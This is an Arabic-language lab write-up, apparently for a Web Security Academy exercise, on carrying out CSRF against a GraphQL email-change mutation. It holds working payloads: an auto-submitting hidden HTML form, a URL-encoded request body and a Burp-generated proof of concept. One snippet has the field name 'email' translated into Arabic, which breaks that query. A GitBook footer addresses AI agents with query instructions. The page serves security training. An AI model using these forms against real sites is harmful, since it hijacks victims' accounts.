> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/web/graphql/csrf-exploitation-via-graphql.md).

# استغلال CSRF عبر GraphQL

### تنفيذ هجمات CSRF عبر GraphQL

#### سياق المختبر

تعتمد ميزات إدارة المستخدمين على **GraphQL** نقطة النهاية. / النقطة الأساسية: l

**الهدف:** أنشئ صفحة HTML (مستضافة على خادم الاستغلال) بحيث، عند تحميلها من قبل الضحية، **تغيّر عنوان بريدها الإلكتروني**.

<figure><img src="/files/8489636d0bf31e60b0356571accd3c2ce1e3a24d" alt=""><figcaption></figcaption></figure>

#### استعلام GraphQL الملاحظ

عندما تغيّر البريد الإلكتروني من التطبيق، يبدو الطلب المرسل كالتالي

```json
{
  "query": "/n    mutation changeEmail($input: ChangeEmailInput!) {/n        changeEmail(input: $input) {/n            email/n        }/n    }/n",
  "operationName": "changeEmail",
  "variables": {
    "input": {
      "email": "test@test.com"
    }
  }
}
```

### الطريقة 1: CSRF بسيط باستخدام نموذج (مُوصى به)

الفكرة هي إعادة إنتاج تغيير GraphQL عبر **إرسال POST عبر النموذج** إلى نقطة نهاية GraphQL، مع `query`, `operationName` و `variables` الحقول.

مثال على عملية ليتم إدراجها في الأداة:

```javascript
<form
  class="login-form"
  name="change-email-form"
  action="https://0ace0022038ab64b803c033800f30057.web-security-academy.net/graphql/v1"
  method="POST"
>
  <input type="hidden" name="query" value="
    mutation changeEmail($input: ChangeEmailInput!) {
      changeEmail(input: $input) {
        البريد الإلكتروني
      }
    }
  ">

  <input type="hidden" name="operationName" value="changeEmail">

  <input
    type="hidden"
    name="variables"
    value='{"input":{"email":"hacked@jord4n.pro"}}'
  >
</form>

<script>
  document.forms["change-email-form"].submit();
</script>
```

<figure><img src="/files/41ab7ccea2448347d552909a1b13b7b7c5de2906" alt=""><figcaption></figcaption></figure>

النتيجة المتوقعة: عندما يفتح الضحية الصفحة، يرسل متصفحُه الطلب و **يتم تغيير البريد الإلكتروني**.

<figure><img src="/files/d661cbde73ba92e9980d9e586267059008a25ce9" alt=""><figcaption></figcaption></figure>

### الطريقة 2: x-www-form-urlencoded

هنا، تقوم بترميز المعلمات مباشرة كما في نموذج تقليدي:

```bash
Content-Type: application/x-www-form-urlencoded
```

{% code overflow="wrap" %}

```bash
query=%0A++++mutation+changeEmail($input:+ChangeEmailInput!)+{%0A++++++++changeEmail(input:$input)+{%0A++++++++++++email%0A++++++++}%0A++++}%0A&operationName=changeEmail&variables={"input":{"email":"test@test.com"}}
```

{% endcode %}

عملي للتحقق بسرعة من شكل الطلب.

<figure><img src="/files/076a8d40d1d4e3865b6a164d08a79ca3eeefcaa1" alt=""><figcaption></figcaption></figure>

من Burp:

1. انقر بزر الماوس الأيمن على طلب GraphQL
2. **أدوات الالتزام** → **إنشاء PoC لـ CSRF**
3. ينشئ Burp ملف HTML جاهزًا للاستضافة، مثلًا:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0ace0022038ab64b803c033800f30057.web-security-academy.net/graphql/v1" method="POST">
      <input type="hidden" name="query" value="&#10;&#32;&#32;&#32;&#32;mutation&#32;changeEmail&#40;&#36;input&#58;&#32;ChangeEmailInput&#33;&#41;&#32;&#123;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;changeEmail&#40;input&#58;&#36;input&#41;&#32;&#123;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;email&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#125;&#10;&#32;&#32;&#32;&#32;&#125;&#10;" />
      <input type="hidden" name="operationName" value="changeEmail" />
      <input type="hidden" name="variables" value="&#123;&quot;input&quot;&#58;&#123;&quot;email&quot;&#58;&quot;test&#64;test&#46;com&quot;&#125;&#125;" />
      <input type="submit" value="إرسال الطلب" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

```

<figure><img src="/files/2d387a721cb681c2ff8be8b4b3315c4b1a0d8d00" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/web/graphql/csrf-exploitation-via-graphql.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
